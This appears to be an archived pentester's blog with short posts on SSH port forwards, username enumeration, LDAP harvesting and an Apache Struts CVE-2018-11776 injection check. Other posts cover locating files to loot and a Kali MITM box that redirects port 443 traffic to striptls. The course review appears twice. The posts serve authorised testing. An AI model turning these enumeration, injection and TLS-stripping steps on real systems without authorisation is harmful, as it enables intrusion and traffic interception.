Friday, December 21, 2018
Python - Choose a Function at Random
If you need to randomly select from a number of defined functions, this is a simple way to achieve that:
import random

def function_A(some_var):
    return "{} - A".format(some_var)

def function_B(some_var):
    return "{} - B".format(some_var)

def function_C(some_var):
    return "{} - C".format(some_var)

# Run a random function with the input of "blahblah"
random.choice([function_A, function_B, function_C])("blahblah")

# Do it as many times as you'd like, and you'll get different results
random.choice([function_A, function_B, function_C])("blahblah")
random.choice([function_A, function_B, function_C])("blahblah")
random.choice([function_A, function_B, function_C])("blahblah")
random.choice([function_A, function_B, function_C])("blahblah")
Labels:
Programming,
Python
Friday, December 14, 2018
SSH Port Forwards In Simpler Terms
I love SSH, I love port forwards, I love all they allow you to do. I hate my memory and all it forgets to do. I decided to write the following so I can easily recall the syntax and meaning for SSH port forwards (-L & -R).
Firstly, both use the same syntax (order of parameters doesn't matter):
ssh root@someVPS -i ~/.ssh/whateverKey -L localhost:2323:localhost:2424
ssh root@someVPS -i ~/.ssh/whateverKey -R localhost:2323:localhost:2424
Even though they are both basically From:To, they have different meanings because -L and -R have different contexts.
-L localhost:2323:localhost:2424 means:
- Create a listening socket on my local laptop (the client) listening at localhost:2323
- Any connection coming into that socket (on my local laptop) is sent over the SSH connection to the VPS's "localhost:2424" - assuming some app is listening on the server on 2424 so this connection is actually useful.
- Can be more easily understood as "-L LocalContextIP:LocalPort:RemoteContextIP:RemotePort"
-R localhost:2323:localhost:2424 means the inverse:
- Create a listening socket on the VPS at localhost:2323
- Any connection into that socket (on the remote VPS) send over the SSH connection to the Laptop's "localhost:2424"
- Can be more easily understood as "-R RemoteContextIP:RemotePort:LocalContextIP:LocalPort"
It's important to note that this isn't restricted to localhost. You can "bounce" connections either way just by changing the "To:" location.
Bounce a connection from my laptop to my VPS and out to Google? Sure:
ssh root@someVPS -i ~/.ssh/whateverKey -L localhost:2323:google.com:80
Bounce a connection from my VPS to my laptop and out to Google? Sure:
ssh root@someVPS -i ~/.ssh/whateverKey -R localhost:2323:google.com:80
-L & -R are really doing nothing more than telling you the direction that the traffic flows. -L is from client -> server and -R is from server -> client.
I use the term "context" here because that's really what it is: each side resolves the IPs/hostnames in its half of the forward using whatever is local to _that_ machine.
This means that if my VPS has an entry in /etc/hosts for "1.1.1.1 yoloswag" and my laptop has an entry for "2.2.2.2 yoloswag", they will mean different things depending on where in the command you place "yoloswag".
There, now I won't have to second-guess myself every time I try to create a reverse tunnel through 8 different boxes.
Stupid SSH Trick:
So if you understood what I just wrote, you should say to yourself: "wait, doesn't that mean I can have two tunnels passing data back and forth forever?" Yes. Yes you can. And it's dumb. Here's how it works:
First, anything coming into your laptop's localhost:3030 gets sent out to the VPS's localhost:3131:
ssh yolohax -L localhost:3030:localhost:3131
Second, anything coming into your VPS's localhost:3131 gets sent out to your laptop's localhost:3030:
ssh yolohax -R localhost:3131:localhost:3030
Go ahead and try it, and watch your network usage. Once you issue your first transmission (echo infinitelooplol | ncat localhost 3030) you should see a constant 0.5-1.5 Kbps in both directions. Ctrl-C'ing it won't help because the data is stuck in a tunnel loop. You have to kill one of the tunnels for it to end.
Wednesday, November 28, 2018
Keep Track Of Your Source IP
Pentesters/red teamers often need to track their outgoing IPs so blue teams can correlate activity and know whether an attack is scheduled activity or something else.
Below is a script that will reach out, grab your public IP, and if it's different from the last entry, enter it into a log file. I use crontab to execute it at the top of every minute.
#!/bin/bash
# This script records changes to your external IP to a log file with timestamp
# Install:
#   crontab -e
#   * * * * * /Users/MYUSERNAME/WHEREVER/iplog.sh
# And then change the iplogfileloc below to where you want the logfile to save.
# You should have an iplog.txt with contents like this:
#   $ cat iplog.txt
#   Wed Nov 28 12:56:40 MST 2018 -- 177.243.11.21
#   Wed Nov 28 13:00:07 MST 2018 -- 17.18.24.6

# Change the below location to what you want
iplogfileloc="/Users/MYUSERORWHATEVERHERE/iplog.txt"

myip=$(curl httpbin.org/ip 2> /dev/null | grep origin | awk '{print $2}' | tr -d '"')

# Create the file if it doesn't exist
[ -f ${iplogfileloc} ] || touch ${iplogfileloc}

# If your IP has changed, add it to the file
if ! tail -1 ${iplogfileloc} | grep ${myip} > /dev/null ; then
    echo $(date) '--' ${myip} >> ${iplogfileloc}
fi
Now you can change IPs via VPN or whatever and always be able to refer to it later. The only edge case is if you change IPs multiple times within one minute, but that should be rare and accounted for in sprays.
Labels:
Bash,
Network,
Programming,
Redteam
Monday, November 26, 2018
Ways to Enumerate Users
Below are some methods to identify usernames that can then be used in other areas of a pentest. I added as many as I could think of, mostly limited to ones usable from the public Internet.
- WebApp login error username enumeration (custom per webapp, use python/burp)
- WebApp URL/Cookie differences (custom per webapp, use python/burp)
- Document Metadata from google dork (https://github.com/ElevenPaths/FOCA)
- Public leaks/dumps (mostly just linkedin)
- skype/Lyncsmash (https://github.com/nyxgeek/lyncsmash)
- Exposed SMB/RID Cycling (https://github.com/portcullislabs/enum4linux)
- Kerberos Username Validation (https://nmap.org/nsedoc/scripts/krb5-enum-users.html)
- OWA username enumeration (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/owa_login.rb)
- WordPress logins (https://github.com/wpscanteam/wpscan)
- Openssh username enumeration (https://www.exploit-db.com/exploits/45233)
- SMTP VRFY Username Enumeration (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smtp/smtp_enum.rb)
- SMTP EXPN Username Enumeration (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smtp/smtp_enum.rb)
- SMTP RCPT TO Username Enumeration (http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum)
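As a quick taste of the SMTP techniques at the bottom of the list, Python's standard smtplib exposes VRFY directly. This is a minimal sketch, not one of the tools linked above; the host and usernames are placeholders, and many mail servers disable VRFY, so treat results with suspicion:

```python
import smtplib

def is_hit(code):
    """SMTP reply codes that suggest the server recognized the mailbox."""
    return code in (250, 251, 252)

def vrfy_users(host, usernames):
    """Issue VRFY for each candidate and return the ones the server accepts."""
    found = []
    smtp = smtplib.SMTP(host, 25, timeout=10)
    for user in usernames:
        code, message = smtp.verify(user)
        if is_hit(code):
            found.append(user)
    smtp.quit()
    return found

# Hypothetical usage:
# vrfy_users("mail.target.example", ["jsmith", "asysadmin", "root"])
```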
Labels:
Metasploit,
Network,
Redteam,
Web
Tuesday, September 18, 2018
Saner Bash Commands Inside Python
As great as Python is, sometimes the devs make really weird decisions regarding defaults. A perfect example is running shell commands inside Python 3+. For some reason they thought it was a good idea to make the subprocess "run" method _not_ capture stdout or stderr by default. I find this incredibly annoying and it constantly results in me having to look up the syntax since I always forget it.
I decided to instead write this little helper function to encapsulate what I consider saner defaults. I decode the bytes into UTF-8 since that's the output of 99% of all bash commands.
#!/usr/bin/env python3
import subprocess

def run_cmd(cmd):
    result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    result.stdout = result.stdout.decode('utf8')
    result.stderr = result.stderr.decode('utf8')
    return result
Running that function will execute whatever command you pass it (insecure, so use it appropriately) and returns an object on which you can then check the return code, stdout, and stderr.
So now, it's just:
In [25]: if 'root' in run_cmd('whoami').stdout:
   ....:     print("you are root")
   ....:
you are root
Labels:
Programming,
Python,
Shells
Thursday, August 30, 2018
Download All Corporate Git Repos
Depending on the client you are testing, they may have an internal development team that checks code into a git repo. The vast majority of the clients I've seen implement the Atlassian suite of tools, typically containing an internally hosted Bitbucket.
The Bitbucket web interface has a search feature for looking for code snippets. It's absolutely awful - like an off-brand Tonka toy reject of a search function. You know what's way better? grep. That means I'd have to download every repo to search it locally. I did that with this script:
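The original embedded script didn't survive the trip to this page, so here is a hedged reconstruction of the idea: walk Bitbucket Server's paged /rest/api/1.0/repos listing and git clone every HTTP clone link it returns. The host and credentials are placeholders.

```python
BASE = "https://bitbucket.internal.example.com"  # placeholder internal host

def clone_urls(repo_page):
    """Pull the HTTP clone links out of one page of /rest/api/1.0/repos output."""
    urls = []
    for repo in repo_page.get("values", []):
        for link in repo["links"]["clone"]:
            if link["name"] == "http":
                urls.append(link["href"])
    return urls

def fetch_all_clone_urls(session):
    """Walk Bitbucket's paged repo listing until isLastPage comes back true."""
    start = 0
    while True:
        page = session.get(f"{BASE}/rest/api/1.0/repos",
                           params={"start": start, "limit": 100}).json()
        yield from clone_urls(page)
        if page.get("isLastPage", True):
            break
        start = page["nextPageStart"]

# Hypothetical usage (requires the requests library):
#   import requests, subprocess
#   s = requests.Session()
#   s.auth = ("myuser", "mypassword")
#   for url in fetch_all_clone_urls(s):
#       subprocess.run(["git", "clone", url])
```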
It's handy to note that grepping isn't the only good thing about cloning repos locally. It allows you to run the myriad of vuln checker tools, load up the code into an IDE and run source/sink analysis on it, and much more.
Labels:
Network,
Programming,
Python
Wednesday, August 29, 2018
Brute Force LDAP Names (or how I kinda downloaded LDAP)
Running queries over a network using the ldapsearch tool can be a bit annoying. It's especially annoying when you constantly run into the "size limit exceeded" result when you get large responses.
I decided to write a little tool to recursively and conditionally search LDAP for CN entries (basically AD account names) and download them locally. If it detects the size limit error, it automatically adds a new character to drill down further.
It works fantastically well. After you run this tool you should have many .out files containing LDAP query responses. Grep to your heart's content:
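The embedded tool itself didn't survive, so here is a hedged sketch of the recursive approach described above: query CNs by prefix with ldapsearch and, when the server complains about its size limit, drill down by appending another character. The server, base DN, and output file naming are placeholders.

```python
import string
import subprocess

SERVER = "ldap://dc01.corp.example.com"   # placeholder DC
BASE_DN = "DC=corp,DC=example,DC=com"     # placeholder base DN

def hit_size_limit(output):
    """ldapsearch reports an overflow as 'Size limit exceeded' (result 4)."""
    return "Size limit exceeded" in output

def query(prefix):
    """Run one ldapsearch for CN entries starting with prefix."""
    result = subprocess.run(
        ["ldapsearch", "-x", "-H", SERVER, "-b", BASE_DN,
         f"(cn={prefix}*)", "cn"],
        stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return result.stdout.decode("utf8", errors="replace")

def harvest(prefix=""):
    """Recurse: prefixes that overflow get another character appended."""
    for char in string.ascii_lowercase + string.digits:
        output = query(prefix + char)
        if hit_size_limit(output):
            harvest(prefix + char)   # too many hits, drill further
        else:
            with open(f"ldap-{prefix + char}.out", "w") as f:
                f.write(output)      # small enough, save this chunk
```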
Labels:
Network,
Programming,
Python
Thursday, August 23, 2018
Apache Struts 2 Vulnerability & Exploit (CVE-2018-11776)
Yesterday a new vulnerability in certain versions of Apache Struts (2.3 - 2.3.34, 2.5 - 2.5.16) was discovered that leads to RCE. It requires both a vulnerable version and a vulnerable configuration.
The gist of the issue is that if you have a vulnerable configuration that doesn't lend a namespace to Struts, Struts will take the user-specified namespace instead. Fortunately (for attackers), it takes the namespace and evaluates it as an OGNL expression, allowing you to fairly easily get remote code execution.
Working PoC (I personally tested it and it works):
https://github.com/jas502n/St2-057
Technical deep dive on finding the vulnerability:
https://lgtm.com/blog/apache_struts_CVE-2018-11776
Vuln writeup by Semmle (including conditions for vulnerable configurations)
https://semmle.com/news/apache-struts-CVE-2018-11776
Apache's security bulletin for the vuln:
https://cwiki.apache.org/confluence/display/WW/S2-057
Mitre CVE link:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
A couple caveats I found while testing:
- It definitely requires a lack of namespace attribute in the classes xml
- All that is required for successful exploitation is a single proper GET request
- Doesn't work on all struts-showcase installs (2.3.15 wasn't working for some reason), making me think it may be a bit finicky
I modified the PoC listed above into a simple Python function:
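My function was lost to the embed gods, so below is a hedged reconstruction of the detection half: inject a harmless OGNL expression (${175*175}) as the namespace and see whether the math comes back evaluated in the redirect. The action name and URL layout are assumptions; adjust them for the target.

```python
def build_url(base_url, expr, action="actionChain1.action"):
    """Place an OGNL expression where the namespace belongs in the URL."""
    return f"{base_url}/{expr}/{action}"

def check_struts_11776(base_url):
    """Return True if the namespace injection appears to evaluate."""
    import requests  # kept local so the helper above stays dependency-free
    resp = requests.get(build_url(base_url, "${175*175}"),
                        allow_redirects=False, timeout=10)
    # On vulnerable configs the evaluated result (30625) lands in the
    # redirect Location or the body
    return "30625" in resp.headers.get("Location", "") or "30625" in resp.text
```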
Labels:
Exploit Dev,
Web
Wednesday, August 15, 2018
Twitter Controlled Anything - Micropython on ESP32
I recently purchased an ESP32 from Amazon for testing purposes, and a colleague mentioned you could install a minimalist Python environment on them for control. To say the least, I was intrigued.
I wanted to be able to control a light (or anything really) using tweets. Below are the instructions/scripts I wrote to get it working. First comes the prerequisites:
- ESP32 (duh)
- A VPS, Pi, or really any computer acting as a flask server (it just needs internet access)
- A wifi network for the ESP32 to connect to; I just used the hotspot on my phone as a PoC
- Twitter API credentials (really easy to get, just fill out the forms)
TLDR:
Your ESP32 will query your flask server for a trigger word to enable the LED. The flask server will query Twitter for your latest top tweet and, if it has a trigger word in it, relay that to the ESP32 client. Boom, tweet causes LED to turn on.
The first step is to get your ESP32 set up running the micropython environment. I followed this excellent guide.
Once you get your ESP32 configured to run Python code, go ahead and transfer the following script to act as the client. You just need to change the wifi details and target flask server:
import machine
import urequests
import time

pin = machine.Pin(2, machine.Pin.OUT)

def connect():
    import network
    sta_if = network.WLAN(network.STA_IF)
    if not sta_if.isconnected():
        print('connecting to network...')
        sta_if.active(True)
        sta_if.connect('WIFINETWORKSSIDHERE', 'WIFIPASSWORDHERE')
        while not sta_if.isconnected():
            pass
    print('network config:', sta_if.ifconfig())

def no_debug():
    import esp
    # this can be run from the REPL as well
    esp.osdebug(None)

no_debug()
connect()

while True:
    time.sleep(2)
    if 'yes' in urequests.get('http://MYFLASKDOMAINHERE.com:5000').text:
        pin.value(1)
Connect the LED to Pin 2 on the ESP32 and it's all set to go. Now onto the flask server...
On your VPS/Pi/whatever, install flask and tweepy and create a directory to hold your script files. Grab the Access Token, Access Secret, Consumer Secret, Consumer Key from your Twitter Dev console that you set up earlier and place them in a "twitter_creds.py" file like the following:
ACCESS_TOKEN = '18077065-lakjsdflkajshdlfkajshdflkajsdhqqSYOtHSXtK1'
ACCESS_SECRET = 'hPqlkwjehrlkfjnlqwejhqrwklejrqhlwkejrJr1'
CONSUMER_KEY = 'QZlk9qlkwejrhqlkwjerhlqwlLh'
CONSUMER_SECRET = 'uEnkzjxcnvluqblwjbefkqwlekjflkqjwehflqlkjhuOE'
Then paste the following into "tweepy_top.py" (the flask app imports it by that name):
from twitter_creds import *
import tweepy

auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)

def get_top_tweet():
    top_tweet = api.user_timeline(count=1)
    return top_tweet[0].text
Now create your main flask app by pasting the following into "flaskhello.py":
from flask import Flask
from tweepy_top import get_top_tweet

app = Flask(__name__)

@app.route("/")
def hello():
    if 'light' in get_top_tweet():
        return 'yes'
    else:
        return 'no'

if __name__ == "__main__":
    app.run(host="0.0.0.0", threaded=True)
There you can see 'light' is used as the trigger word. Using this setup, every 2 seconds the ESP32 makes a request to your flask server, which causes the flask server to query Twitter for the user's top tweet. If the top tweet contains the word "light", the server returns the string "yes". The ESP32 recognizes the "yes" and turns on pin 2.
This is a very simple PoC and gets the job done. You can take this and expand in a thousand directions with it, some ideas:
- A desktop counter that keeps track of your followers, retweets, likes, etc
- An LED scroller that outputs your latest mentions
- Or simply use twitter as the control for some device
The options are endless...enjoy :D
Labels:
Hardware,
Just For Fun,
Programming,
Python,
Web,
WiFi
Thursday, August 2, 2018
Top 100 Ingredients From HomeChef Recipes
I love cooking; I consider it my primary hobby outside of infosec/coding. I had HomeChef for several months and absolutely loved it. I looked forward to each selection every week and always got to try new techniques/flavors/combinations I probably never would have tried on my own.
Every meal they sent us had a double-sided recipe page to guide you through the process. I noticed something at the bottom of the recipe page:
They have a handy link for each recipe posted on their website, probably so it's easy to share what you made with family/friends. The fact that I saw a number, along with a list of ingredients, got me thinking...
If I were to stock my pantry/fridge with "basic" ingredients, what would it look like? How about I count up the occurrences of each ingredient across the recipe pages? That should give me a good idea.
Well after gathering the data over a couple of days (I kept everything slow so as to not cause any problems) I present to you, the top 100 ingredients according to recipes on HomeChef.com
Count Ingredient
609 Garlic Cloves
433 Butter
345 Boneless Skinless Chicken Breasts
320 Green Onions
315 Shallot
219 Lemon
210 Sour Cream
208 Lime
202 Red Onion
186 Grape Tomatoes
178 Red Bell Pepper
170 Parsley Sprigs
158 Yellow Onion
154 Mayonnaise
153 Red Pepper Flakes
152 Honey
149 Liquid Egg
148 Cremini Mushrooms
142 Russet Potatoes
142 Green Beans
138 Jasmine Rice
135 Cilantro Sprigs
134 Sugar
131 Chopped Ginger
125 Baby Arugula
122 Grated Parmesan Cheese
119 Carrot
117 Roma Tomato
114 White Cooking Wine
104 Baby Spinach
102 Grated Parmesan
101 Panko Breadcrumbs
100 Light Cream
100 Shredded Mozzarella
99 Slaw Mix
98 Jalapeño Pepper
95 Cilantro
95 Shrimp
94 Thyme Sprigs
93 Zucchini
93 Garlic Clove
89 Parsley
88 Sriracha
87 Dijon Mustard
84 Sirloin Steaks
82 Cornstarch
76 Heavy Whipping Cream
76 Light Brown Sugar
75 Seasoned Rice Vinegar
74 Romaine Heart
73 Pork Tenderloin
72 Kale
72 Shredded Cheddar Cheese
72 Asparagus
71 Sweet Potato
71 Flour
69 Roasted Red Peppers
69 Spinach
69 Ground Beef
68 Salmon Fillets
68 Matchstick Carrots
68 Toasted Sesame Oil
62 Brussels Sprouts
62 Soy Sauce - Gluten-Free
61 Carrots
60 Mini Baguette
57 Small Flour Tortillas
57 Persian Cucumber
57 Basil Pesto
56 Green Onion
56 Ground Turkey
54 Teriyaki Glaze
54 Radishes
54 Red Fresno Chile
53 Beef Demi-Glace
52 Ear of Corn
51 Basil Sprigs
51 Roasted Chicken Breast
50 Roma Tomatoes
50 Blue Cheese
50 Canned Evaporated Whole Milk
49 Marinara Sauce
49 Extra Firm Tofu
48 Smoked Paprika
47 Balsamic Vinegar
47 Naan Flatbreads
47 Bacon Strips
47 Chicken Demi-Glace
46 Taco Seasoning
45 Avocado
45 Broccoli Florets
45 Frozen Peas
44 Chives
44 Corn Kernels
44 Plain Greek Yogurt
44 Tilapia Fillets
43 Navel Orange
43 Feta Cheese
43 Bone-in Pork Chops
What would a post be without some code? Below is the embarrassing Python script (hey, it worked...) that parses the HTML:
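The embarrassing script itself didn't survive the embed, so here is a hedged reconstruction of the counting half using only the standard library. It assumes the recipe pages were saved locally and that ingredients are tagged with itemprop="recipeIngredient" (the attribute my XPATH notes query):

```python
from collections import Counter
from html.parser import HTMLParser

class IngredientParser(HTMLParser):
    """Collect the text of any tag carrying itemprop="recipeIngredient"."""
    def __init__(self):
        super().__init__()
        self.ingredients = []
        self._grab = False

    def handle_starttag(self, tag, attrs):
        self._grab = ("itemprop", "recipeIngredient") in attrs

    def handle_data(self, data):
        if self._grab and data.strip():
            self.ingredients.append(data.strip())
            self._grab = False

def count_ingredients(pages):
    """Tally ingredient occurrences across an iterable of HTML strings."""
    counts = Counter()
    for html in pages:
        parser = IngredientParser()
        parser.feed(html)
        counts.update(parser.ingredients)
    return counts

# Hypothetical usage against saved pages:
#   import glob
#   counts = count_ingredients(open(f).read() for f in glob.glob("recipes/*.html"))
#   for name, count in counts.most_common(100):
#       print(count, name)
```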
Labels:
Just For Fun,
Programming,
Python,
Web
XPATH Notes (how to grep xpath)
XPATH is a querying language for XML document trees. Lots of web scrapers use it since HTML can be represented as XML directly.
Your basic "grep" like XPATH query is something like the following:
- //*[@itemprop="recipeIngredient"]
Breakdown:
- // = start at root of tree and include itself in any searches
- * = any tag, anywhere in the document, otherwise replace with tag name
- [blah] = evaluate the condition blah inside the brackets
- @itemprop = This is how you reference attributes instead of tags
- [@itemprop] = the condition is: if the itemprop attribute exists on some tag
- [@itemprop="recipeIngredient"] = condition is: if the itemprop attribute's value is "recipeIngredient"
Search any tag for an href attribute of example.com:
- //*[@href='example.com']
Or limit it just to direct hyperlinks like "a" tags:
- //a[@href='example.com']
XPATH has a lot more functionality than this but this is mostly what I need it for.
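If you want to try these queries without firing up a scraper, Python's standard xml.etree supports a useful subset of XPath (queries are relative, so // becomes .//). A quick sketch on some made-up HTML:

```python
import xml.etree.ElementTree as ET

html = """<html><body>
  <span itemprop="recipeIngredient">Garlic Cloves</span>
  <span itemprop="recipeIngredient">Butter</span>
  <a href="example.com">a link</a>
</body></html>"""

root = ET.fromstring(html)

# Any tag with a matching itemprop attribute
ingredients = [el.text for el in root.findall('.//*[@itemprop="recipeIngredient"]')]

# Limit the match to "a" tags
links = root.findall(".//a[@href='example.com']")

print(ingredients)   # ['Garlic Cloves', 'Butter']
print(len(links))    # 1
```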
PS.
The expression in the condition brackets "[blah]" can be used with certain functions: https://www.w3schools.com/xml/xpath_syntax.asp
Labels:
Programming,
Python,
Ruby,
Web
Wednesday, August 1, 2018
Finding Interesting Files Using Statistical Analysis
I noticed a pattern when scrounging for target data on pentests. Most of the time, the files where I find valuable data (test creds/log data/unencrypted logs/etc.) are in some way different from those around them. Sometimes it's their filename, like when you have 400 files named "NightlyLogDATE" and you see a "NightlyLogDATE.bak". It also tends to happen with file sizes: you'll have a directory where almost every file is around 400-600KB, and a couple will be megabytes big or only a couple KB.
These files are "interesting" to me because they differ in some way. These are the outliers. Sometimes they will be temporary backup files where a tech needed to test credit card processing with encryption turned off, or maybe some error pumped traceback/debug output to an otherwise normal file.
I decided to scrounge around online to stitch together a script that will report these outlier files.
The following script will look in the target directory, calculate the median absolute deviation, compare it against a threshold and return the filenames for you to prioritize pillaging.
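The stitched-together script didn't make it into this page, so here is a hedged sketch of the approach: compute a modified z-score from the median absolute deviation of the file sizes and report anything past a threshold (the 0.6745 constant and 3.5 cutoff come from the usual MAD outlier recipe; tune to taste):

```python
import os
import sys
from statistics import median

def mad_outliers(sizes, threshold=3.5):
    """Indexes of values whose modified z-score exceeds the threshold."""
    med = median(sizes)
    mad = median(abs(s - med) for s in sizes)
    if mad == 0:
        return []  # everything identical, nothing stands out
    return [i for i, s in enumerate(sizes)
            if 0.6745 * abs(s - med) / mad > threshold]

def interesting_files(directory, threshold=3.5):
    """Filenames in directory whose sizes deviate from their neighbors."""
    names = [f for f in os.listdir(directory)
             if os.path.isfile(os.path.join(directory, f))]
    sizes = [os.path.getsize(os.path.join(directory, f)) for f in names]
    return [names[i] for i in mad_outliers(sizes, threshold)]

if __name__ == "__main__":
    for name in interesting_files(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(name)
```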
It's fairly basic so I'm happy to accept any code donations :D
Labels:
Programming,
Python,
Redteam,
Shells
Friday, July 27, 2018
A Review Of Alex Ionescu's Windows Internals For Reverse Engineers
This year (2018) at Recon in Montreal I signed up to take a class from Alex Ionescu called "Windows Internals for Reverse Engineers", the following are my thoughts on the course and experience.
I decided to take this class after being completely demolished at Infiltrate's "Click Here for Ring Zero" course. That course, despite all its faults, told me I wasn't as strong in Windows Internals as I thought I was. I figured, taking the Windows Internals course from one of the guys that literally writes the book would be a good step. Boy, was I right.
I've taken a lot of training and had lots of bad teachers in the past. Some of those teachers were monotone, non-engaged, unable to map new information to existing concepts, unprepared course material, broken labs, etc. Alex and his course was none of these things. I'm going to break down my evaluation of the teacher and course separately since those are the two main components in all training. I'm going to end with any prerequisites, and final thoughts/recommendations.
Teacher - Alex Ionescu
After going through the training (and talking to several other people in the class) I can confidently say that Alex is at the top (or top 2) of my list in effective communication and teaching. Alex has struck a rare combination of technical mastery over a subject (Windows Internals) as well as the ability to map new information to other people's current understanding.
The course and its materials were inextricably linked with the teacher, so it's difficult to speak to them independently, but here goes nothing.
Make no mistake, this course is not for beginners. It is a full blown firehose of information and topics for 4 days straight. He's pretty relentless and if it wasn't for the fact that he's a fantastic teacher, you'd be easily lost on day one. The course material is extremely technical, in depth, and just a whole lot of it too.
Some things you'll learn about:
For a higher level explanation of the topics you'll cover, Recon's training site was fairly accurate, granted it doesn't give you a sense of the depth. It's deep, yo.
Prerequisites
On the course signup page he mentions the following in "Class Requirements":
Areas of Improvement
I'm really reaching here since, honestly, if nothing changed about this course it would still be toward the top of my list. The only thing I wish could change would be more hands-on labs and perhaps some reference material in the back of the handout: things like common WinDBG commands, the C++ notation he uses, and other commonly referenced information. I'd also recommend cutting some pieces he feels aren't as necessary, to distill the content a bit more. But like I said, I'm reaching pretty hard here. If you are ready for the course, take it. I highly recommend it.
Recommendation
If you feel you are at the point in your career where you need a better understanding of Windows internals to be more effective, and you meet the prerequisites, I strongly recommend this course. While it's marketed toward reverse engineers (which I am not), it does help the more senior pentester/red teamer who is looking to branch out into custom Windows malware.
If I could go back in time to my previous self trying to make the decision on whether or not to take this course, I'd tell him to definitely take it. But I'd also tell him to read more of the Windows Internals book before he started class :D
PS.
People pronounce windbg in many ways, "win-dee-bee-jee", "win-debug", etc. He pronounces it "wind-bag" which I find too weird for my tastes. I believe I've discovered the true sentiment and feeling of the tool by pronouncing it my own way: "win-deebag".
I decided to take this class after being completely demolished at Infiltrate's "Click Here for Ring Zero" course. That course, despite all its faults, told me I wasn't as strong in Windows Internals as I thought I was. I figured taking the Windows Internals course from one of the guys who literally writes the book would be a good step. Boy, was I right.
I've taken a lot of training and had lots of bad teachers in the past. Some of those teachers were monotone, disengaged, or unable to map new information to existing concepts; some had unprepared course material, broken labs, etc. Alex and his course were none of these things. I'm going to break down my evaluation of the teacher and the course separately, since those are the two main components of any training. I'll end with prerequisites and final thoughts/recommendations.
Teacher - Alex Ionescu
After going through the training (and talking to several other people in the class) I can confidently say that Alex is at the top (or top 2) of my list in effective communication and teaching. Alex has struck a rare combination of technical mastery over a subject (Windows Internals) as well as the ability to map new information to other people's current understanding.
He exhibited many good teacher practices, below are some of the ones that stood out to me:
- He would give context for the target material by explaining "neighbor" material that was related, making it easier to understand the technical context and draw logical conclusions.
- He explained the history behind certain design choices in Windows to help eliminate the "Why the hell would they do it that way?" feeling.
- Extremely well prepared with the handout material.
- Extremely well prepared with presentation material. He had annotation software allowing him to draw data structures and quickly highlight information pertinent to his point. He also had a countdown timer for breaks/lunch so no one ever asked how much time we had left. He always showed up a minute or two before it expired and started on time.
- Was engaging with humor (poked fun at Microsoft devs several times) and not monotone at all.
- Almost never read from the slides, all the information was well understood and presented fluidly.
The course and its materials were inextricably linked with the teacher, so it's difficult to speak to them independently, but here goes nothing.
Make no mistake, this course is not for beginners. It is a full-blown firehose of information and topics for 4 days straight. He's pretty relentless, and if it weren't for the fact that he's a fantastic teacher, you'd easily be lost on day one. The course material is extremely technical and in-depth, and there's just a whole lot of it, too.
Some things you'll learn about:
- Setting up local and remote kernel debug machines
- Windbg syntax, functions, and capabilities
- OS design/decisions for memory and execution models, address space layout, shared data fields (KUSER_SHARED_DATA), functions and capabilities of the hypervisor
- Secure UEFI boot signing, hypervisor based code integrity, PatchGuard, HyperGuard, memory segmentation
- Software guard extensions on new CPUs, kernel/etc interrupts, system calls w/wo hypervisor enabled, win32k.sys
- Windows object manager, the object directory, kernel handle table, sandboxing
That's maybe 10% of the course right there. I just flipped through the handout and wrote down the slide titles and topics I could remember.
For a higher level explanation of the topics you'll cover, Recon's training site was fairly accurate, granted it doesn't give you a sense of the depth. It's deep, yo.
Prerequisites
On the course signup page he mentions the following in "Class Requirements":
IMPORTANT: It's helpful to understand x86/x64/ARM assembly to take this course, but knowledge of obfuscation, packing, etc., is not required. Basic knowledge of Windows, processor architecture, and operating systems is helpful – you should have some vague idea of what an interrupt is, and what is the difference between user and kernel mode (ring levels), a bit about virtual memory/paging, etc.
I would add a couple more to that list:
- Familiarity with C++ notation/syntax (he uses it a lot in windbg)
- An understanding of certain programming concepts such as common data structures, type casting, overloading, modules, macros, memory paging, kinds of linked lists, etc.
I personally recommend you give the latest Windows Internals book a read through before coming to this class. It will help tremendously in not being lost.
Areas of Improvement
I'm really reaching here since, honestly, if nothing changed about this course it would still be towards the top of my list. I'd say the only thing I wish could change would be more hands-on labs and perhaps some reference material in the back of the handout: things like common WinDBG commands, the C++ notation he uses, and other commonly referenced information. I'd also recommend maybe cutting out some pieces he feels aren't as necessary to distill the content a bit more. But like I said, I'm reaching pretty hard here. If you are ready for the course, take it. I extremely recommend it.
Recommendation
If you feel you are at the point in your career where you need a better understanding of Windows Internals to be more effective, and you meet the prerequisites, I strongly recommend this course. While it's marketed towards reverse engineers (which I am not), it does help the more senior pentester/red teamer who is looking to branch out into custom Windows malware.
If I could go back in time to my previous self trying to make the decision on whether or not to take this course, I'd tell him to definitely take it. But I'd also tell him to read more of the Windows Internals book before he started class :D
PS.
People pronounce windbg in many ways, "win-dee-bee-jee", "win-debug", etc. He pronounces it "wind-bag" which I find too weird for my tastes. I believe I've discovered the true sentiment and feeling of the tool by pronouncing it my own way: "win-deebag".
Labels:
Personal Development,
Programming,
Training,
Windows
Wednesday, July 25, 2018
Setting Up A Kali Interception VM
Twice now I've had to set up an interception proxy for testing protocol implementations. Below are the steps I took to configure a Kali VM as my main MITM box. I decided not to use a MITM attack like ARP spoofing, but instead set up Kali as a middling router. The networking setup is rather simple:
TargetDevice (over USB Ethernet adapter)-> Kali VM (Bridged Mode) -> Laptop's Wifi
- Download/install Kali as a virtual machine
- Set the VM in bridged mode (VMware breaks some things)
- Follow the guide here to get Internet sharing configured on Kali: http://itfanatic.com/?q=node/84
- Create an iptables rule to redirect your target traffic to your proxy software. Here I'm redirecting all traffic over 443 to 2020 (where striptls is listening): iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 2020
- Download striptls from github
- Run it locally with something like: ./striptls.py -s --listen 0.0.0.0:2020 --remote exampletarget.com:443
Running striptls is obviously not mandatory, since step 3 configured a working middle machine. I just used it in my testing to strip the STARTTLS command from XMPP and HTTPS. You now have a machine that all traffic flows through, at your disposal to do with as you wish.
